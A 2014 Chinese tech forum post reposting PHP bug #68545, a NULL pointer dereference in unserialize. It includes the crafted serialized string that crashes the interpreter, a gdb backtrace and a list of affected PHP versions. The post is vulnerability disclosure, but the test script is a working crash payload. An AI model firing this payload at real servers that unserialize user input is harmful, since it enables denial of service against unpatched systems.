天空小小岛技术论坛

 找回密码
 注册
搜索
查看: 3822|回复: 0

[其他] php的 unserialize 一个漏洞

[复制链接]
s.Bo 发表于 2014-12-29 10:32:20 | 显示全部楼层 |阅读模式
本帖最后由 s.Bo 于 2014-12-29 10:36 编辑

php Version 5.6.4 ChangeLog 中显示修复了一个漏洞
Fixed bug #68545 (NULL pointer dereference in unserialize.c).


https://bugs.php.net/bug.php?id=68545

Description:
------------
There's a NULL pointer deference issue in the var_push_dtor function in unserialize.c.

By running the test script, you'll get following segfault:
Program received signal SIGSEGV, Segmentation fault.
var_push_dtor (var_hashx=0x0, rval=0x7ffff7fdb858) at /home/charlie/php-5.6.3/ext/standard/var_unserializer.c:62
62              var_entries *var_hash = (*var_hashx)->last_dtor;


According to 3v4l.org, it crashes on following versions(http://3v4l.org/BtYZg):
4.3.10 - 4.4.9, 5.0.3 - 5.6.3, php7@20140507 - 20141101:



Test script:
---------------
<?php
echo unserialize('a:6:{a:6:{s:3:"322";s:3:"bar";s:3:"bar";s:3:"foo";a:6:{a:6:{s:3:"322";s:3:"bar";s:3:"bar";s:3:"foo";s:3:"bar";a:6:{a:6:{s:3:"322";s:3:"bar";s:3:"bar";s:3:"foo";a:6:{a:6:{s:3:"322";s:3:"bar";s:3:"b22";s:3:"bar";s:3:"bar";s:3:"foo";s:3:"bar";a:6:{a:6:{s:3:"322";s:3:"bar";s:3:"bar";s:3:"foo";s:3:"bar";s:3:"bar";');
?>


Expected result:
----------------
The interpreter shouldn't crash.

Actual result:
--------------
(gdb) bt
#0  var_push_dtor (var_hashx=0x0, rval=0x7ffff7fdb7d0) at /home/charlie/php-5.6.3/ext/standard/var_unserializer.c:62
#1  0x00000000004481af in process_nested_data (p=0x7fffffffab80, max=0x7ffff7fdccf7 "", var_hash=0x0, ht=0x7ffff7fdb700, elements=4, objprops=0, rval=<optimized out>)
    at /home/charlie/php-5.6.3/ext/standard/var_unserializer.c:329
#2  0x0000000000fdc686 in php_var_unserialize (rval=<optimized out>, p=0x7fffffffab80, max=0x7ffff7fdccf7 "", var_hash=0x0) at /home/charlie/php-5.6.3/ext/standard/var_unserializer.c:815
#3  0x0000000000447436 in process_nested_data (p=0x7fffffffab80, max=0x7ffff7fdccf7 "", var_hash=0x7fffffffab90, ht=0x7ffff7fdb678, elements=5, objprops=0, rval=<optimized out>)
    at /home/charlie/php-5.6.3/ext/standard/var_unserializer.c:297
#4  0x0000000000fdc686 in php_var_unserialize (rval=<optimized out>, p=0x7fffffffab80, max=0x7ffff7fdccf7 "", var_hash=0x7fffffffab90) at /home/charlie/php-5.6.3/ext/standard/var_unserializer.c:815
#5  0x0000000000f9884a in zif_unserialize (ht=<optimized out>, return_value=0x7ffff7fda908, return_value_ptr=<optimized out>, this_ptr=<optimized out>, return_value_used=<optimized out>)
    at /home/charlie/php-5.6.3/ext/standard/var.c:965
#6  0x000000000158cf5c in zend_do_fcall_common_helper_SPEC (execute_data=0x7ffff7fa8110) at /home/charlie/php-5.6.3/Zend/zend_vm_execute.h:558
#7  0x0000000001483b1a in execute_ex (execute_data=0x7ffff7fa8110) at /home/charlie/php-5.6.3/Zend/zend_vm_execute.h:363
#8  0x00000000012824cd in zend_execute_scripts (type=8, retval=0x0, file_count=3) at /home/charlie/php-5.6.3/Zend/zend.c:1344
#9  0x000000000105522a in php_execute_script (primary_file=0x7fffffffd1c0) at /home/charlie/php-5.6.3/main/main.c:2584
#10 0x000000000159a1ed in do_cli (argc=3, argv=0x22979a0) at /home/charlie/php-5.6.3/sapi/cli/php_cli.c:994
#11 0x000000000045052d in main (argc=3, argv=0x22979a0) at /home/charlie/php-5.6.3/sapi/cli/php_cli.c:1378
#12 0x00007ffff710976d in __libc_start_main () from /lib/x86_64-linux-gnu/libc.so.6
#13 0x0000000000450601 in _start ()



漏洞报告中测试代码执行 unserialize时可以直接使php崩溃
  1. <?php
  2. echo unserialize('a:6:{a:6:{s:3:"322";s:3:"bar";s:3:"bar";s:3:"foo";a:6:{a:6:{s:3:"322";s:3:"bar";s:3:"bar";s:3:"foo";s:3:"bar";a:6:{a:6:{s:3:"322";s:3:"bar";s:3:"bar";s:3:"foo";a:6:{a:6:{s:3:"322";s:3:"bar";s:3:"b22";s:3:"bar";s:3:"bar";s:3:"foo";s:3:"bar";a:6:{a:6:{s:3:"322";s:3:"bar";s:3:"bar";s:3:"foo";s:3:"bar";s:3:"bar";');
复制代码


受影响版本
PHP 5.0.*
PHP 5.2.*
PHP 5.3.*
PHP 5.4.*版本 < 5.4.36
PHP 5.5.*版本 < 5.5.20
PHP 5.6.*版本 < 5.6.4

您需要登录后才可以回帖 登录 | 注册

本版积分规则

小黑屋|手机版|Archiver|天空小小岛 ( 京ICP备17043412号-1|

GMT+8, 2018-11-20 01:54 , Processed in 0.099861 second(s), 18 queries , Gzip On.

Powered by Discuz! X3.1

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表